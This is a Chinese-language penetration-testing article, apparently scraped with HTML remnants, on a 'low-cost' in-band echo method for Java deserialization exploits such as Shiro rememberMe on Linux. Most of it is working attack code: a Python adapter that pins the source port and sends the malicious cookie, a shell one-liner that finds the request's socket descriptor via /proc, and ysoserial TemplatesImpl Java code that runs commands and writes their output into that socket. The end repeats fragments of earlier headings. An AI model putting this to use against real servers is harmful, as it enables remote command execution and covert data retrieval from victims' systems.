Linux下Java反序列化通杀回显方法的低配版实现<\/h1>

技术背景<\/h2>

Java反序列化漏洞（如Shiro反序列化）在实际渗透测试中非常实用，主要因为：<\/p>

payload原生加密（无特征）<\/li>
危害大（属于Java反序列化漏洞）<\/li>

项目中较常见<\/li> <\/ul>

但存在两个主要痛点：<\/p>

可用的gadget链<\/li>

带内回显问题（不出网时的回显）<\/li> <\/ol>

技术原理<\/h2>

核心思路<\/h3>
通过Java反序列化执行代码获取本次HTTP请求使用的socket文件描述符，然后直接在该文件描述符中写入回显内容。<\/p>

关键技术点<\/h3>

socket文件描述符与inode关系<\/strong>：<\/p>

Linux系统中每个socket都有一个唯一的inode号<\/li>
inode号出现在\/proc\/net\/tcp<\/code>文件中<\/li>
每个inode对应一条TCP连接信息，其中包含远程连接的IP和端口<\/li> <\/ul> <\/li>
实现流程<\/strong>：<\/p> 通过指定客户端请求的源端口号<\/li> 在\/proc\/net\/tcp<\/code>中匹配该端口获取inode<\/li> 通过inode在\/proc\/[pid]\/fd<\/code>目录下找到对应的文件描述符<\/li> 使用Java代码打开该文件描述符并写入回显内容<\/li> <\/ul> <\/li> <\/ol> 详细实现<\/h2> 1. 指定请求源端口<\/h3> 使用Python的requests库自定义源端口：<\/p> class<\/span> SourcePortAdapter<\/span>(HTTPAdapter): <\/span><\/span> """Transport adapter that allows us to set the source port"""<\/span> <\/span><\/span> def<\/span> __init__(self, port, *<\/span>args, **<\/span>kwargs): <\/span><\/span> self.<\/span>_source_port =<\/span> port <\/span><\/span> super(SourcePortAdapter, self).<\/span>__init__(*<\/span>args, **<\/span>kwargs) <\/span><\/span> <\/span><\/span> def<\/span> init_poolmanager<\/span>(self, connections, maxsize, block=<\/span>False<\/span>): <\/span><\/span> self.<\/span>poolmanager =<\/span> PoolManager( <\/span><\/span> num_pools=<\/span>connections, maxsize=<\/span>maxsize, <\/span><\/span> block=<\/span>block, source_address=<\/span>(''<\/span>, self.<\/span>_source_port)) <\/span><\/span> <\/span><\/span># 使用示例<\/span> <\/span><\/span>s =<\/span> requests.<\/span>Session() <\/span><\/span>s.<\/span>mount(target, SourcePortAdapter(randNum)) <\/span><\/span>resp =<\/span> s.<\/span>get(target, cookies=<\/span>{'rememberMe'<\/span>: base64_ciphertext.<\/span>decode()}, timeout=<\/span>5<\/span>, headers=<\/span>headers, verify=<\/span>False<\/span>) <\/span><\/span><\/code><\/pre>2. 获取socket文件描述符<\/h3> 使用Linux命令组合获取文件描述符：<\/p> a=<\/span>`<\/span>cat \/proc\/$PPID\/net\/tcp6|awk '{if($10>0)print}'<\/span>|grep -i %s|awk '{print $10}'<\/span>`<\/span>; <\/span><\/span>b=<\/span>`<\/span>ls -l \/proc\/$PPID\/fd|grep $a|awk '{print $9}'<\/span>`<\/span>; <\/span><\/span>echo -n $b <\/span><\/span><\/code><\/pre>3. Java代码实现<\/h3> 假设使用TemplatesImpl作为gadget末端，修改ysoserial中的命令执行部分：<\/p> \/\/ 获取文件描述符 <\/span><\/span><\/span><\/span>String[]<\/span> cmd =<\/span> {<\/span> "\/bin\/sh"<\/span>,<\/span> "-c"<\/span>,<\/span> "a=`cat \/proc\/$PPID\/net\/tcp6|awk '{if($10>0)print}'|grep -i %s|awk '{print $10}'`;b=`ls -l \/proc\/$PPID\/fd|grep $a|awk '{print $9}'`;echo -n $b"<\/span>};<\/span> <\/span><\/span>java.<\/span>io<\/span>.<\/span>InputStream<\/span> in =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd).<\/span>getInputStream<\/span>();<\/span> <\/span><\/span>java.<\/span>io<\/span>.<\/span>InputStreamReader<\/span> isr =<\/span> new<\/span> java.<\/span>io<\/span>.<\/span>InputStreamReader<\/span>(<\/span>in);<\/span> <\/span><\/span>java.<\/span>io<\/span>.<\/span>BufferedReader<\/span> br =<\/span> new<\/span> java.<\/span>io<\/span>.<\/span>BufferedReader<\/span>(<\/span>isr);<\/span> <\/span><\/span>StringBuilder stringBuilder =<\/span> new<\/span> StringBuilder();<\/span> <\/span><\/span>String line;<\/span> <\/span><\/span> <\/span><\/span>while<\/span> ((<\/span>line =<\/span> br.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>){<\/span> <\/span><\/span> stringBuilder.<\/span>append<\/span>(<\/span>line);<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>int<\/span> num =<\/span> Integer.<\/span>valueOf<\/span>(<\/span>stringBuilder.<\/span>toString<\/span>()).<\/span>intValue<\/span>();<\/span> <\/span><\/span> <\/span><\/span>\/\/ 执行命令并获取结果 <\/span><\/span><\/span><\/span>cmd =<\/span> new<\/span> String[]{<\/span>"\/bin\/sh"<\/span>,<\/span>"-c"<\/span>,<\/span>"ifconfig"<\/span>};<\/span> <\/span><\/span>in =<\/span> Runtime.<\/span>getRuntime<\/span>().<\/span>exec<\/span>(<\/span>cmd).<\/span>getInputStream<\/span>();<\/span> <\/span><\/span>isr =<\/span> new<\/span> java.<\/span>io<\/span>.<\/span>InputStreamReader<\/span>(<\/span>in);<\/span> <\/span><\/span>br =<\/span> new<\/span> java.<\/span>io<\/span>.<\/span>BufferedReader<\/span>(<\/span>isr);<\/span> <\/span><\/span>stringBuilder =<\/span> new<\/span> StringBuilder();<\/span> <\/span><\/span> <\/span><\/span>while<\/span> ((<\/span>line =<\/span> br.<\/span>readLine<\/span>())<\/span> !=<\/span> null<\/span>){<\/span> <\/span><\/span> stringBuilder.<\/span>append<\/span>(<\/span>line);<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>String ret =<\/span> stringBuilder.<\/span>toString<\/span>();<\/span> <\/span><\/span> <\/span><\/span>\/\/ 写入文件描述符 <\/span><\/span><\/span><\/span>java.<\/span>lang<\/span>.<\/span>reflect<\/span>.<\/span>Constructor<\/span> c =<\/span> java.<\/span>io<\/span>.<\/span>FileDescriptor<\/span>.<\/span>class<\/span>.<\/span>getDeclaredConstructor<\/span>(<\/span>new<\/span> Class[]{<\/span>Integer.<\/span>TYPE<\/span>});<\/span> <\/span><\/span>c.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span> <\/span><\/span>java.<\/span>io<\/span>.<\/span>FileOutputStream<\/span> os =<\/span> new<\/span> java.<\/span>io<\/span>.<\/span>FileOutputStream<\/span>((<\/span>java.<\/span>io<\/span>.<\/span>FileDescriptor<\/span>)<\/span>c.<\/span>newInstance<\/span>(<\/span>new<\/span> Object[]{<\/span>new<\/span> Integer(<\/span>num)}));<\/span> <\/span><\/span>os.<\/span>write<\/span>(<\/span>ret.<\/span>getBytes<\/span>());<\/span> <\/span><\/span>os.<\/span>close<\/span>();<\/span> <\/span><\/span><\/code><\/pre>技术限制<\/h2> 必须控制请求源端口<\/strong>：<\/p> 无法在BurpSuite中使用（代理端口不可控）<\/li> 如果目标在反向代理后，源端口不可预测<\/li> <\/ul> <\/li> 连接会立即断开<\/strong>：<\/p> 回显后服务端会直接断开连接<\/li> HTTP响应包不会返回，导致requests库报错<\/li> <\/ul> <\/li> <\/ol> 改进方向<\/h2> 高级版实现思路<\/strong>：<\/p> 通过JVM堆内存直接获取socket对象<\/li> 不需要依赖客户端源端口作为过滤条件<\/li> <\/ul> <\/li> 可能的实现方式<\/strong>：<\/p> 利用JVM内部机制获取当前请求的socket对象<\/li> 使用更底层的方法访问网络连接<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 这种低配版实现虽然有一定限制，但为Java反序列化回显问题提供了一个可行的解决方案。在实际内网环境中，当目标不出网时，这种方法可以作为应急方案使用。对于更通用的解决方案，需要深入研究JVM内部机制和Linux网络栈实现。<\/p>

Linux下Java反序列化通杀回显方法的低配版实现<\/h1>

技术原理<\/h2>

核心思路<\/h3> 通过Java反序列化执行代码获取本次HTTP请求使用的socket文件描述符，然后直接在该文件描述符中写入回显内容。<\/p>

详细实现<\/h2>

核心思路<\/h3>
通过Java反序列化执行代码获取本次HTTP请求使用的socket文件描述符，然后直接在该文件描述符中写入回显内容。<\/p>